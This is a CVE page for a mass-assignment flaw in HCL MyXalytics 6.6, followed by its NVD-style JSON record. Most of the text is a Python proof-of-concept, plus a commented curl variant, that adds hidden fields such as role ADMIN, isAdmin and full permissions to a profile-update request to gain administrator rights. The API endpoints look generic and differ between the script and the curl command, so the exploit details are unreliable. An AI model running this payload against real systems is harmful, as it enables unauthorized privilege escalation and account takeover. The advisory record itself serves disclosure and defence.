CVE-2025-52656

# CVE-2025-52656 - HCL MyXalytics 6.6 Mass Assignment PoC # This PoC demonstrates the Mass Assignment vulnerability by sending # additional privileged fields in a normal user request. import requests import json # Target configuration TARGET_URL = "https://target-myxalytics-host:port" SESSION_COOKIE = "JSESSIONID=your_session_cookie_here" # Step 1: Intercept a normal profile update request # Normal user fields that are expected normal_fields = { "firstName": "John", "lastName": "Doe", "email": "[email protected]", "department": "Analytics" } # Step 2: Add malicious fields (Mass Assignment payload) # These fields are not exposed in the UI but will be bound to the model malicious_fields = { "role": "ADMIN", # Privilege escalation "isAdmin": True, # Admin flag "permissions": ["ALL"], # Full permissions "accountStatus": "ACTIVE", # Account status manipulation "userLevel": 99, # User level escalation "groupId": "admin_group_001" # Admin group assignment } # Combine normal and malicious fields payload = {**normal_fields, **malicious_fields} # Step 3: Send the crafted request headers = { "Content-Type": "application/json", "Cookie": SESSION_COOKIE, "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" } try: response = requests.post( f"{TARGET_URL}/api/user/profile/update", headers=headers, data=json.dumps(payload), verify=False ) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") # Step 4: Verify privilege escalation if response.status_code == 200: verify_response = requests.get( f"{TARGET_URL}/api/user/profile", headers=headers, verify=False ) print(f"Updated Profile: {verify_response.text}") except Exception as e: print(f"Error: {e}") # Alternative: Using curl command # curl -X POST "https://target/api/user/update" \ # -H "Content-Type: application/json" \ # -H "Cookie: JSESSIONID=xxx" \ # -d '{ # "firstName": "John", # "lastName": "Doe", # "email": "[email protected]", # "role": "ADMIN", # "isAdmin": true, # "permissions": ["ALL"] # }'

{"cve": {"id": "CVE-2025-52656", "sourceIdentifier": "[email protected]", "published": "2025-10-03T19:15:46.637", "lastModified": "2025-10-08T16:50:39.200", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL MyXalytics: 6.6.  is affected by Mass Assignment vulnerability. Mass Assignment occurs when user input is automatically bound to application objects without proper validation or access controls, potentially allowing unauthorized modification of sensitive fields."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-915"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:dryice_myxalytics:6.6:*:*:*:*:*:*:*", "matchCriteriaId": "63206848-DCF7-4835-A58C-5F3E7F455E5C"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124411", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}